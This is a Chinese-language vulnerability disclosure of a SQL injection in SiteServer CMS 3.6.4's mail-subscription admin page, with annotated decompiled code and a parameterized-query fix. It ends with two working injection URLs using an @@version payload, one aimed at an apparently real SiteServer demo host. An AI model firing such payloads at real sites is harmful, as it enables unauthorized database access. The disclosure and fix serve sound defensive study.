

siteserver最新版3.6.4 background_mailSubscribe.aspx页面注入

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] 注入存在 /siteserver/cms/background_mailSubscribe.aspx。用 .NET Reflector 反编译 SiteServer.CMS.dll 这个文件,查看代码如下:if (((((uint) isPostBack) - ((uint) isPostBack)) >= 0) && isPostBack)...

注入存在/siteserver/cms/background_mailSubscribe.aspx
 
用.NET Reflector 反编译SiteServer.CMS.dll这个文件
 
查看代码如下:
 
 
 
// Decompiler output from an obfuscated assembly. The unsigned ">= 0" test is always
// true, so as written this branch depends only on isPostBack.
// NOTE(review): Keyword, DateFrom and DateTo are read straight from the query string
// and passed to GetSelectCommend; no validation or encoding is visible in this excerpt.
// The string that comes back is assigned as the SelectCommand of spContents.
if (((((uint) isPostBack) - ((uint) isPostBack)) >= 0) && isPostBack)

    {

        this.spContents.SelectCommand = DataProvider.MailSubscribeDAO.GetSelectCommend(base.PublishmentSystemID, base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);

    }

    // The else branch is not included in the excerpt.
    else


Keyword



// Builds the SELECT statement text for siteserver_MailSubscribe: a fixed column list
// followed by whatever has been accumulated in `builder`.
// The listing is an excerpt of flattened, obfuscated control flow; several jump targets
// (Label_02D7, Label_0311, Label_026E) and the initialisation of `builder` are not shown.
// NOTE(review): the caller shown on this page passes Request.QueryString values for
// keyword, dateFrom and dateTo, so these strings are attacker-controlled.
public string GetSelectCommend(int publishmentSystemID, string keyword, string dateFrom, string dateTo)

{

    // This item is obfuscated and can not be translated.

    StringBuilder builder;

    bool flag;

    bool flag2;

    if (publishmentSystemID != 0)

    {

        goto Label_02D7;

    }

    // Unsigned ">= 0" is always true, so this jump is always taken once reached.
    if ((((uint) publishmentSystemID) + ((uint) publishmentSystemID)) >= 0)

    {

        goto Label_0311;

    }

    // Not reachable by fall-through as written, because the test above is always true.
    goto Label_026E;

Label_002D:

    // The result is raw SQL text built by string concatenation; no parameter objects are
    // created anywhere in the visible code.
    return ("SELECT ID, PublishmentSystemID, Receiver, Mail, IPAddress, AddDate FROM siteserver_MailSubscribe " + builder.ToString());

Label_0069:

    // dateTo is formatted directly between single quotes. No escaping or type check is
    // visible here, so a quote character in the value terminates the literal.
    // It should be bound as a typed parameter rather than formatted into the text.
    builder.AppendFormat("(AddDate <= '{0}')", dateTo);

    goto Label_002D;



.....



// Continuation of the same obfuscated method. The jump targets Label_016C, Label_0151
// and Label_02B6 are not part of the excerpt.
Label_0197:

    // An unsigned value is always <= uint.MaxValue, so this jump is always taken.
    if ((((uint) flag2) + ((uint) flag)) <= uint.MaxValue)

    {

        goto Label_016C;

    }

    // Not reachable by fall-through as written.
    goto Label_0151;

Label_01B4:

    // "x & 0" is always 0, so this condition is always false and the jump is never taken.
    if ((((uint) flag) & 0) != 0)

    {

        goto Label_02B6;

    }

    // keyword is formatted into both LIKE patterns between single quotes. No escaping is
    // visible, so the request value becomes part of the SQL text itself.
    // A bound parameter (with the % wildcards added to the parameter value) would keep it as data.
    builder.AppendFormat("(Receiver LIKE '%{0}%' OR Mail LIKE '%{0}%')", keyword);

    goto Label_0197;

 

 
 
http://www.target.com/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
 
 
http://2012.moban.siteserver.cn/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
修复方案:
对那几个参数(Keyword、DateFrom、DateTo)过滤;更稳妥的做法是改用参数化查询,不要把请求参数直接拼接进 SQL 语句。
